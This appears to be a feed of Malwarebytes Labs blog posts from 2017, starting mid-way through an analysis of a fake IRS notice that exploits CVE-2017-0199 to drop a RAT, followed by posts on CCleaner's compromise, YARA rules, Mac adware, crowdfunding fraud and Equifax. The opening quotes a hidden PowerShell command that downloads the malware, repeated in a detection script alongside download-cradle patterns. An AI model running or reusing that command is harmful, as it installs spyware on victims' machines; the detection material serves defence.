ftp://lindrupmartinsen[.]no:21/httpdocs/test/template.hta

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://82.211.30[.]108/css/intelgfx.exe', 'C:\Users\[username]\AppData\Roaming\62962.exe');

Payload

The downloaded payload (intelgfx.exe) extracts several components into a local folder and achieves persistence using a decoy shortcut. The VBS scripts ensure that the main module runs without showing its GUI, in order to remain invisible to the victim.

RMS agent stands for Remote Manipulator System and is a remote control application made by a Russian company. It appears that in this case, the attackers took the original program (as pictured below) and slightly customized it, not to mention the fact that they are using it for nefarious purposes, namely spying on their victims.

Its source code shows the debugging path information and name that they gave to the module.

Office exploits and RATs

This is not the first time that CVE-2017-0199 is used to distribute a RAT. Last August, TrendMicro described an attack where the same exploit was adapted for PowerPoint and used to deliver the REMCOS RAT. It also shows that threat actors often repackage existing toolkits – which can be legitimate – and turn them into full-fledged spying applications.
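Whatever RAT ends up on disk, the delivery chain is the same: an Office process ends up spawning a script host or a hidden PowerShell that fetches something from the internet, and that chain is what host-based detection should key on. The script below is an added example for this page, not Malwarebytes’ detection logic. It walks a constructed set of process-creation events (the command lines reuse the defanged URLs and paths from this post; the process ids and the mshta.exe variant are made up, and the exact tree on a real system depends on how the HTA handler is invoked) and scores any shell or script host whose ancestry includes an Office application.

```python
"""Scoring shells and script hosts spawned under an Office process."""
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "wordpad.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "cmd.exe"}

URL_RE = re.compile(r"\b(?:https?|ftp)://", re.I)
# PowerShell download cradles; illustrative, not exhaustive
DOWNLOAD_RE = re.compile(
    r"DownloadFile|DownloadString|Net\.WebClient|Invoke-WebRequest|BitsTransfer", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)

# Constructed process-creation events (Sysmon event 1 style); URLs kept defanged on purpose
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "cmdline": r'"WINWORD.EXE" /n "C:\Users\victim\Downloads\CP2000IRS.doc"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile("
                r"'http://82.211.30[.]108/css/intelgfx.exe', 'C:\Users\victim\AppData\Roaming\62962.exe');"},
    # Hypothetical variant: the HTA handed to mshta.exe as a child of Word
    {"pid": 400, "ppid": 200, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe ftp://lindrupmartinsen[.]no:21/httpdocs/test/template.hta"},
    # Benign: an administrator running PowerShell from Explorer
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile Get-ChildItem C:\Temp"},
]


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _ancestors(event, by_pid, max_depth=4):
    """Parent chain, nearest first, stopping at unknown pids or max_depth."""
    chain, cur = [], by_pid.get(event["ppid"])
    while cur is not None and len(chain) < max_depth:
        chain.append(cur)
        cur = by_pid.get(cur["ppid"])
    return chain


def detect(events):
    """Return one alert per shell/script host that descends from an Office application."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        image = _basename(e["image"])
        if image not in SCRIPT_HOSTS and image not in SHELLS:
            continue
        ancestors = _ancestors(e, by_pid)
        if not any(_basename(a["image"]) in OFFICE_APPS for a in ancestors):
            continue
        reasons = ["office-spawned-" + ("script-host" if image in SCRIPT_HOSTS else "shell")]
        score = 1
        cmd = e["cmdline"]
        if URL_RE.search(cmd):
            score += 1
            reasons.append("remote-url")
        if DOWNLOAD_RE.search(cmd):
            score += 2
            reasons.append("download-cradle")
        if HIDDEN_RE.search(cmd):
            score += 1
            reasons.append("hidden-window")
        chain = " -> ".join(_basename(a["image"]) for a in reversed(ancestors)) + " -> " + image
        alerts.append({"pid": e["pid"], "chain": chain, "score": score, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in sorted(detect(SAMPLE_EVENTS), key=lambda a: -a["score"]):
        print(a["score"], a["chain"], a["reasons"])
```

The Office-ancestor test is done transitively rather than on the direct parent because the exploit may interpose mshta.exe or cmd.exe between Word and PowerShell; the benign PowerShell under Explorer is never scored. The same rule expressed in a SIEM would want the parent image from the logging pipeline rather than a reconstructed tree, which loses accuracy when pids are reused.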

We reported the compromised FTP server to its owner. Malwarebytes users were already protected against CVE-2017-0199 as well as its payload which is detected as Backdoor.Bot.

Thanks to @hasherezade for help with payload analysis.

Indicators of compromise

Word doc CVE-2017-0199

82.211.30[.]108/css/CP2000IRS.doc
47ee31f74b6063fab028111e2be6b3c2ddab91d48a98523982e845f9356979c1

HTA script

ftp://lindrupmartinsen[.]no:21/httpdocs/test/template.hta
d01b6d9507429df065b9b823e763a043aa38b722419d35f29a587c893b3008a5

Main package (intelgfx.exe)

82.211.30[.]108/css/intelgfx.exe
924aa03c953201f303e47ddc4825b86abb142edb6c5f82f53205b6c0c61d82c8

RAT module


Other IOCs from same distribution server

82.211.30[.]108/estate.xml
82.211.30[.]108/css/qbks.exe

The post Fake IRS notice delivers customized spying tool appeared first on Malwarebytes Labs.

FTC providing partial refunds for Advanced Tech Support victims

Malwarebytes - Wed, 09/20/2017 - 15:00

Last month, the FTC announced the recovery of 10 million dollars from Advanced Tech Support, one of the most successful US-based tech support scammers ever. This money will be put towards partial refunds for victims of ATS who purchased products or services from them between April 2012 and November 2014. Per the FTC announcement, the deadline for a refund is October 27. To repeat:

The deadline for a refund application is October 27.

Restitution from Advanced Tech Support is notable because most scams based in the United States structure their finances such that only a small core of founders ever see a significant profit. These founders then tend to spend most of their money on extravagant parties, vacations, and other ostentatious displays of wealth – leaving very little to recover. Due to these factors, it’s noteworthy that the FTC was able to recover any significant amount of money at all.

Advanced Tech Support, otherwise known as Inbound Call Experts, has had a lengthy history with Florida law enforcement and the FTC. Check out their case history here, where you can follow the long road it took to bring this company to justice.  And remember:

The deadline for a refund application is October 27.

The post FTC providing partial refunds for Advanced Tech Support victims appeared first on Malwarebytes Labs.

How to tell if your Mac is infected

Malwarebytes - Tue, 09/19/2017 - 15:00

There are a lot of reasons Mac users don’t sweat getting infected. One: They’ve got a built-in anti-malware system called XProtect that does a decent job of catching known malware. Two: Macs are not plagued by a high number of attacks. (Most cybercriminals are focused on infecting PCs.) And three: There’s just not a lot of Mac malware out there.

But that’s changing, and fast: Mac malware has increased by 230 percent in the last year alone. Most Mac users don’t know this, and assume their Mac is fine. For those folks we have one word: adware.

Your Mac is infected…with adware

Adware is software that’s designed to display advertisements, usually within a web browser. Most people don’t willingly download programs whose sole purpose is to bombard you with ads, so adware has to sneak its way onto your Mac. It either disguises itself as legitimate or piggybacks on another program in order to be installed.

Once in your system, adware changes the way your browser behaves by injecting ads into web pages, causing pop-up windows or tabs to open, and changing your homepage or search engine—all in the name of funneling advertising dollars away from companies who pay for online ads and into their own accounts.

Your Mac is infected…and not protected

Sounds pretty shady, right? So why doesn’t the Mac anti-malware program catch these guys? Typically, the makers of adware are hiding in plain sight, operating as actual corporations who claim to sell software on the level. They get away with it because their adware is often hidden in the fine print of a long installation agreement that most people skip over. Is it technically legal? Yes. You accepted the terms of the installation, so they can spam you all they want. But is it right? So far, Apple hasn’t stepped in to crack down on it. But if you ask us, the answer is an emphatic “no.”

In addition to adware, other potentially unwanted programs, such as so-called “legitimate” keyloggers, scammy “cleaning” apps, and faux antivirus programs that don’t actually detect anything are skirting the Mac protections in place. (Because XProtect doesn’t detect and block adware or potentially unwanted programs—only malware that it has seen before.) So if a new form of malware makes its way onto your computer before Apple has a chance to learn about it and write code to protect against it, then you’re out of luck.

So if you ask us, it’s time to start taking a closer look at your Mac. Is it acting the way your sturdy, reliable Mac has always behaved? Or is it exhibiting classic signs of guilt? If something seems a little off, you just might have a problem. Let’s take a look at the telltale signs that your Mac is infected.

Signs of adware

Advertisements are displayed in places they shouldn’t be, literally popping up everywhere. Your web browser’s homepage has been mysteriously changed without your permission. Web pages that you typically visit are not displaying properly, and when you click on a website link, you get redirected to an entirely different site. In fact, even your search engine has been replaced with a different one. If your web browser, search engine, or websites are acting in funky, unpleasant ways, you’ve likely got yourself an adware infection.

Signs of PUPs

Maybe you downloaded a new program to monitor your family’s behavior online. All of a sudden, new icons are appearing on your desktop for software you don’t remember installing. New toolbars, extensions, or plugins are added to your browser. A pop-up appears telling you your Mac may be infected, and you need to install the latest antivirus immediately to get rid of it. Frightened, you do so, and now your computer has turned the corner from automatically installing apps to slowing to a crawl. What’s going on? These are PUPs, and your Mac’s anti-malware system is not going to get rid of them.

Signs of malware

Mac malware making its way onto your system is, right now, relatively rare. But if it does, look out for the same behavior you would expect from an infected Windows machine: your computer’s processing power seems diminished, software programs are sluggish, your browser redirects or is unresponsive, or your ole-reliable starts crashing regularly.

In some cases, you may not be aware of an infection at all. While your computer hums along, info stealers operate quietly in the background, stealing your data for an attack on your bank accounts or identity.

And in the worst case scenario, your Mac can even be infected with ransomware. In March 2016, the first Mac ransomware was spotted, and it was downloaded by thousands of users before Apple had a chance to shut it down. A ransomware attack would be quite obvious to Mac users. Files would be encrypted and cybercriminals would deliver a ransom demand (usually via pop-up) in order to return your data.

Do any of these scenarios sound familiar to you? If so, there are a few steps you can take to remedy the infection. First, back up your files. Next, download a (legitimate) anti-malware program such as Malwarebytes for Mac that’s designed to search and destroy adware, PUPs, and any new forms of malware lurking on the scene. Run a scan and, if there are any nasties hiding away in your pristine Mac OS, it’ll bag, tag, and dump them for you. Then you can finally get your Mac back.

The post How to tell if your Mac is infected appeared first on Malwarebytes Labs.


A week in security (September 11 – September 17)

Malwarebytes - Mon, 09/18/2017 - 22:10

Last week, we dug into phishing campaigns done via Linkedin accounts, remediation versus prevention, issues with smart syringe pumps, and advised you to go patch against a Word 0day. We had some tips regarding identity theft protection, explored crowdsourced fraud, and explained YARA rules.



Stay safe!

Malwarebytes Labs Team

The post A week in security (September 11 – September 17) appeared first on Malwarebytes Labs.


Infected CCleaner downloads from official servers

Malwarebytes - Mon, 09/18/2017 - 15:31

In a supply chain attack that may be unprecedented in the number of downloads, the servers hosting CCleaner, a popular tool for cleaning up the PC, have been delivering a version of the software bundled with malware.

What happened?

Threat actors have managed to change the files that were being delivered by Avast servers hosting CCleaner updates. In case you are wondering why they were on those servers, Avast acquired Piriform, the original publishers of CCleaner, a few months ago.

The incident was discovered and reported by Talos. Piriform is aware of the situation and is acting to prevent further damage. They are also investigating how the files coming from their servers were modified before being released to the public.

Possible impact

It is difficult to say at this moment how many users might have been affected, but the numbers could be huge. According to statistics published by Piriform, CCleaner has been downloaded 2 billion times in total, and 5 million times every week. The modified version, 5.33, was available from August 15 until September 12, when version 5.34 was released. In a press statement the company estimates that 2.27 million people used the affected software.

The malware

The malware collects the following information about the infected system:

  • Computer name
  • A list of installed software, including Windows updates
  • A list of the currently running processes
  • The MAC addresses of the first three network adapters
  • Other system information that is relevant for the malware like admin privileges, whether it is a 64-bit system, etc.

The malware uses a hardcoded C2 server, with a domain generation algorithm (DGA) as a fallback, to send the information about the affected system and fetch the final payload.

What to do if you think you are affected?

First of all, check the version of CCleaner on your system. If you suspect you may have downloaded CCleaner version 5.33.6162 or CCleaner Cloud version 1.07.3191, scan your system for malware.


CCleaner users that are running older versions or that do not trust the one they are using now are encouraged to update their CCleaner software to version 5.34 or higher. The latest version is available for download here.

Affected versions: CCleaner version 5.33.6162 and CCleaner Cloud version 1.07.3191 (both 32-bit Windows builds distributed between August 15 and September 12, 2017, per the timeline above).
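As an added example (written for this page, not part of the original post or of any published rule set), here is a YARA rule a responder could use to sweep download folders and file shares for leftover copies of the affected installers. It assumes the build numbers appear in the PE version resource as the UTF-16LE strings "5.33.6162" and "1.07.3191" next to the "CCleaner" product name, which is how Windows stores VERSIONINFO strings; verify those strings against a known sample before relying on the rule. It finds files that claim to be the affected builds, not the backdoor code itself, so treat hits as candidates for a full malware scan.

```yara
// Added example: hunt for on-disk copies of the affected CCleaner builds.
// Matches on the version resource only, so a hit means "this file says it
// is an affected build", not "this file is confirmed backdoored".
rule Hunt_CCleaner_Affected_Builds
{
    meta:
        description = "PE file whose version resource claims an affected CCleaner build"
        affected    = "CCleaner 5.33.6162, CCleaner Cloud 1.07.3191"
        confidence  = "low: version strings only, confirm with a full scan"

    strings:
        // VERSIONINFO strings are stored as UTF-16LE, hence the 'wide' modifier
        $product       = "CCleaner" wide
        // Assumed representation of the affected build numbers in the resource
        $build_desktop = "5.33.6162" wide
        $build_cloud   = "1.07.3191" wide

    condition:
        // MZ header: only look inside Windows executables
        uint16(0) == 0x5A4D
        and $product
        and ($build_desktop or $build_cloud)
}
```

Run it over a directory tree with `yara -r Hunt_CCleaner_Affected_Builds.yar C:\Users` (or the equivalent path on a file server); any match should then be scanned with an up-to-date anti-malware engine and, if confirmed, replaced with version 5.34 or later.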

Malwarebytes blocks the IP and domains related to this malware. We also remove the malicious installer.

Stay safe!


Pieter Arntz

The post Infected CCleaner downloads from official servers appeared first on Malwarebytes Labs.


Explained: YARA rules

Malwarebytes - Fri, 09/15/2017 - 15:00

YARA rules are a way of identifying malware (or other files) by creating rules that look for certain characteristics. YARA was originally developed by Victor Alvarez of Virustotal and is mainly used in malware research and detection. It was developed with the idea to describe patterns that identify particular strains or entire families of malware.


Each rule has to start with the word rule, followed by the name or identifier. The identifier can contain any alphanumeric character and the underscore character, but the first character is not allowed to be a digit. There is a list of YARA keywords that are not allowed to be used as an identifier because they have a predefined meaning.


Rules are composed of several sections. The condition section is the only one that is required. This section specifies when the rule result is true for the object (file) that is under investigation. It contains a Boolean expression that determines the result. Conditions are by design Boolean expressions and can contain all the usual logical and relational operators. You can also include another rule as part of your conditions.


To give the condition section something to work with you will usually also need a strings section. The strings section is where you define the strings that will be looked for in the file. Let’s look at an easy example.

rule vendor
{
    strings:
        $text_string1 = "Vendor name" wide
        $text_string2 = "Alias name" wide
    condition:
        $text_string1 or $text_string2
}

The rule shown above is named vendor and looks for the UTF-16LE (wide) encodings of the strings “Vendor name” and “Alias name”. If either of those strings is found, the result of the rule is true. Note that every string referenced in the condition must be defined in the strings section; referring to an undefined identifier is a compile error, not a silent non-match.

There are several types of strings you can look for:

  • Hexadecimal, in combination with wild-cards, jumps, and alternatives.
  • Text strings, with modifiers: nocase, fullword, wide (UTF-16LE), and ascii (the default; combine ascii wide to match both encodings).
  • Regular expressions, with the same modifiers as text strings.

There are many more advanced conditions you can use, but they are outside the scope of this post. If you would like to know more you can find it in the YARA documentation.


Metadata can be added to help identify the files that were picked up by a certain rule. The metadata identifiers are always followed by an equal sign and the set value. The assigned values can be strings, integers, or a Boolean value. Note that identifier/value pairs defined in the metadata section can’t be used in the condition section, their only purpose is to store additional information about the rule.
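To put the pieces described above together, here is an added example rule (written for this explainer, not taken from the original post or from any published rule set): a private helper rule that checks for a PE header, and a main rule that uses all three string types with modifiers, a metadata section, and a condition that references the helper rule. Every string, name and URL in it is a placeholder chosen to show the syntax, not an indicator of any real malware family.

```yara
// Added example rule set. Names, byte patterns and strings are placeholders.

// A private rule is evaluated but never reported on its own; other rules
// can use it by name in their condition, which keeps the PE check in one place.
private rule IsPE
{
    condition:
        // 'MZ' at offset 0 and 'PE\0\0' at the offset stored at 0x3C
        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550
}

rule Example_PE_Dropper
{
    meta:
        author      = "analyst"                        // placeholder
        description = "Illustrative rule: PE with loader stub and C2 strings"
        reference   = "https://example.invalid/report" // placeholder URL
        severity    = 3
        in_the_wild = false

    strings:
        // Hex string with wildcards (??), a jump ([4-6]) and alternatives ((A|B)):
        // push imm32 ; call rel32 ; then either 'mov esi,eax' encoding
        $hex_loader = { 68 ?? ?? ?? ?? E8 [4-6] ( 8B F0 | 89 C6 ) }

        // Text strings: ascii and/or wide (UTF-16LE), optionally case-insensitive
        // and bounded by non-alphanumeric characters (fullword)
        $s_ua    = "Mozilla/4.0 (compatible; MSIE 6.0)" ascii wide
        $s_sched = "schtasks" nocase fullword
        $s_ps    = "powershell -enc" nocase

        // Regular expression with the same modifiers: a dotted IPv4 address
        $re_ipv4 = /\b\d{1,3}(\.\d{1,3}){3}\b/ ascii wide

    condition:
        // Cheap checks first: only PE files under 2 MB get the full string scan
        IsPE and filesize < 2MB
        and $hex_loader
        // at least two of the text strings, or several IPs plus the PowerShell stager
        and (2 of ($s_*) or (#re_ipv4 > 2 and $s_ps))
}
```

Note the ordering in the condition: YARA evaluates left to right and short-circuits, so putting the header and size checks before the string terms avoids scanning large or irrelevant files. The `#re_ipv4` form counts occurrences of a string, which is handy when a single match (one IP address in a legitimate binary) would be too noisy on its own.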


YARA is a tool that can be used to identify files that meet certain conditions. It is mainly in use by security researchers to classify malware.


Signature-Based Detection With YARA

Latest YARA documentation

YARA: Simple and Effective Way of Dissecting Malware

Screenshots were made using Yara Editor by Adlice Software

Pieter Arntz

The post Explained: YARA rules appeared first on Malwarebytes Labs.


Crowdsourced fraud and kickstarted scams

Malwarebytes - Thu, 09/14/2017 - 16:00

Crowdsourced funding opportunities via Kickstarter, Patreon, and GoFundMe have removed many structural roadblocks for people to access capital quickly and conveniently. But they’ve also lowered the barrier to entry for many very old scams. So how do you tell the difference between a great cause or project to contribute to and a digital confidence scam? What’s outright fraudulent, and what’s just a company with poor organizational skills? Let us take a look at pitfalls on two crowdfunding platforms.

GoFundMe primarily serves personal projects and donation pages, or other campaigns that otherwise don’t fit the more common commercial model found on Kickstarter. Funding requests cover a wide range of needs, from community sports groups to disaster relief, to education and medical care (for US users). It sounds like a great use of crowdfunding, but when it comes to fraud, things start to get a little iffy. Here’s what GoFundMe’s terms of service (ToS) have to say about its giving campaigns.

GoFundMe has no control over the conduct of, or any information provided by, a Campaign Organizer or a Charity, and GoFundMe hereby disclaims all liability in this regard to the fullest extent permitted by applicable law.

So as far as they’re concerned, buyer beware. But as a platform, they do have some minimal obligations, as well as some additional rules to not run afoul of some onerous regulations. To summarize their ToS, here’s what you can’t raise money for:

  • Drugs
  • Weapons
  • Any financial product
  • Gambling
  • Hate speech
  • Porn
  • Legal defense
  • Fraud

But wait a minute – how can fraud be on the list if they say they won’t vet campaigns? Because these categories largely are about liability and are included to absolve the platform of after-the-fact responsibility. The first four categories can place GoFundMe under regulatory scrutiny, however, and are most likely patrolled by counter-fraud algorithms. If you’d like to know what GoFundMe considers fraud, you can go to their page on the subject, which oddly does not say anything on the matter. They do have a fraud report form, but it requires proof of intentional deception on the part of the organizer. You can go to for examples of how difficult that is.


Kickstarter does a little bit better regarding fraud, requiring that the creators have an actual production plan and prototype to show backers, and prohibits an extensive list of backer rewards. Most important is the list of creator requirements, in particular:

You [must] have an address, bank account, and government-issued ID based in the country that you’re creating a project in.**

This single requirement raises the barrier to entry for most scammers and gives Kickstarter tools to track and permanently deal with scams that make it into the platform. Further, they claim to vet projects to make sure they meet company guidelines before they go live. This is great for the vast majority of online scams that are blatantly fraudulent. Their track record on projects whose vetting requires domain expertise is considerably worse.

SecuritySnakeOil.Org is a site devoted to scammy information security projects on Kickstarter. Most of the projects on review combine open source hardware or software, expansive marketing claims, and entry level security flaws. From “unhackable” routers made from a Raspberry Pi running a years old build of Debian, to products that advertise “A custom operative system (OS) to avoid hacking”, what most of these share is that they cannot be vetted properly without domain expertise. That is, if you don’t know anything about the field, you would have difficulty evaluating their marketing claims, and the project creators don’t do a lot to help.

Even more legitimate projects, such as this Wi-Fi router with a built-in VPN that blocks ads at the perimeter (Neat!), provide no details about any specific technology used in the product. So without adequate, accessible information on what you’re backing, how can you possibly make a safe choice?

What to do about it

Both GoFundMe and Kickstarter offer organizers the ability to link their Facebook account to their pitch. For GoFundMe, this allows you to see if the organizer is, in fact, someone connected to the cause and in a reasonable position to get the funds to the right place. For Kickstarter, Facebook can provide a name to look up an organizer’s employment history (or lack thereof.) But a better question to ask for a project involving an actual product would be this: Are the owner’s claims physically possible?

And lastly, the question that has protected people from fraud for time immemorial: Is this too good to be true?

The post Crowdsourced fraud and kickstarted scams appeared first on Malwarebytes Labs.


Equifax aftermath: How to protect against identity theft

Malwarebytes - Thu, 09/14/2017 - 15:00

Who here is scrambling around in the aftermath of the recent breach at Equifax to figure out if you’ve been compromised? Who here is wondering what to do about it if you are? If you’re one of the 143 million Americans whose data was accessed by cybercriminals, then you probably raised your hand.

Even if you weren’t one of the 143 million, you might still want to take some precautions. You could instead be part of the millions of folks who’ve had their data stolen over the course of online history. Basically, if you have a social security number, have ever run a credit check, or have a pulse, you should listen up. Why? Two words: identity theft.

What could happen?

The Equifax breach gave criminals access to vital personal information, including names, social security numbers, birthdates, addresses, and in some cases, driver’s license IDs and credit card numbers. And here’s just a slice of what those jerks can do with that data:

  • Open financial accounts
  • Apply for credit cards, mortgages, and other financial services
  • Get medical care at your expense
  • File for a tax refund in your name
  • Get a job in your name and let you pay the taxes
  • Steal your benefits
  • All of the above (aka, identity theft)

Who is impacted?

The better question might be, who isn’t? Don’t worry about verifying if your data was stolen—assume it was stolen. This is a decent rule of thumb even before the Equifax breach, but even if that thought never crossed your mind, it’s pretty impossible to verify whether you’ve been impacted at the moment.

The Equifax verification site is currently not returning accurate information. And if you try calling the company now, you might be met with some long waiting times to receive frustratingly vague answers. So if you want to act quickly (and we recommend you do), just bypass the first four stages of grief and go directly to acceptance.

What we do know: Those affected by the breach are predominantly from the US, but there are people from Canada and the UK impacted as well. Some methods that work in one country may not work in others, so please keep in mind that this article is aimed at our US readers. International readers can find some additional information about what to do here.

Steps to protect yourself

Our recommendation is to freeze your credit immediately with all three of the major credit bureaus. By freezing your credit, you’ll prevent criminals from trying to open up new accounts in your name—all of your current credit cards will still work. You’ll only need to consider unfreezing your credit if you want to apply for a loan, open a new credit card, or make any type of purchase that requires a check on your credit.

Three things you’ll want to know before contacting the credit bureaus.

One: You’ll want to pull a credit report. You can get a free report here. It doesn’t matter if you’ve already frozen your accounts, you can still monitor using the free tool. We recommend you pull only one report now, another one in four months, and the third in another four months. It’s not foolproof, but it will allow you to see different reports throughout the year to track any potential changes.

Two: the cost is minimal. While reports have varied—Equifax is offering their credit freeze for free, but it’s pretty hard to get through to them—freezing credit usually only costs a one-time fee of $10 per bureau. That’s 20 or 30 bucks for a whole lot of peace of mind.

Three: You must set or receive PINs when freezing your credit. Save these in a secure location, whether that’s using a password manager or physically storing the printed PIN paper someplace safe and out of sight.

Where to go to freeze your credit

Additional monitoring services

The use of additional monitoring services is entirely up to you. The biggest issue is that both legitimate companies trying to help and scammer companies trying to trick will over-hype the danger of identity theft in order to make a sale. Please make sure that you do your homework and research on these companies before signing up blindly out of fear.

When looking up information about how to protect yourself in situations like these, look to sites like the Federal Trade Commission or other technology publications such as Wired, The Verge, or Vice’s Motherboard, as they won’t be trying to upsell you to credit protection you may or may not need. The wrong company might actually hurt your ability to stave off ID theft.

General best practices

We wish we could say that the above advice is going to save you from all the dangers associated with this breach. For credit theft, you are covered, but for all the other threats associated with scammers or fraudsters looking to capitalize on this situation, here are some additional guides on how to avoid their traps.


Be on the alert for credit scams or any related terms. You’ll see these in emails, ads on social sites or games, and even physical mail to your home. These attacks are part of what we refer to as social engineering, and they will run rampant for many months and years to come. Always be skeptical, and if you’re not sure about something, ask a professional.

Phone or text scams

Since your data was most likely taken, that means your numbers will be shared even more than they already are today. Calls and texts from unknown numbers, numbers with similar area codes, or numbers very similar to yours should be treated as potential scams.

You might think that the National Do Not Call Registry would protect you from this. Sadly, it does not. It offers protection from legit companies trying to solicit your business. It does not offer protection against scammers. (Because why would criminals follow the law, anyway?)

my Social Security account

The my Social Security account allows you to keep track of the social security funds you’ll be collecting in the future. Although it was not affected by the Equifax breach, it’s good practice to get this account set up in your name, as someone else could easily grab it and you’d be locked out of your future payments. One caveat: If you want to set up this account, you’ll need to do it before you freeze your credit. (Otherwise they can’t confirm your identity through the account.)

Passwords and two-factor authentication

Ensure you’re using a smart password strategy (long, complex, and unique: never reuse the same password across multiple sites or services) and, if available, enable two-factor authentication (2FA) on every account possible. You can check the 2FA availability on your sites and services here.

Enable alerts on your accounts

While your current accounts shouldn’t be impacted by this breach, it’s never a bad idea to keep an eye on your bank accounts and credit cards for larger purchases. For accounts rarely used, you could set alerts to $1 so you’re notified the second any transaction happens. For regular accounts, set the alerts to a dollar amount that would seem out of place for that card, whether it’s $20 or $500.

New phone accounts

A common attack vector with credit/personal data breaches is to purchase new phone accounts through your provider, on your account! Once criminals have your info, they’ll call up the phone company and say they want to add a new line but don’t have a PIN. If you haven’t set up a PIN with your phone company already, they have no way to verify your account. So guess what? BAM! There’s a new phone on your bill. In order to protect yourself from this type of attack, go ahead and set up a PIN with your provider.


Tax returns

File these as soon as possible next year! For multiple years we’ve heard about victims of tax return fraud, wherein a scammer using your personal information files YOUR return before you can. So don’t wait on this one.


If you’re affected by the Equifax breach, you have a heightened risk of becoming a victim of identity theft. But at this juncture, the point is moot. Since it’s difficult to discover a definitive answer, it’s best to assume you are and deal with the fallout.

We’ve given you some direction on what to do to avoid identity theft and credit fraud, and we hope you take a deep breath, crack your neck, and get to work nailing your personal info down. One new credit card created by an attacker in your name is going to cause a massive headache. Better to stay ahead of it than spend the next month trying to convince a bank that you didn’t open an account. Good luck, be vigilant and stay safe.


The Malwarebytes Labs team

The post Equifax aftermath: How to protect against identity theft appeared first on Malwarebytes Labs.
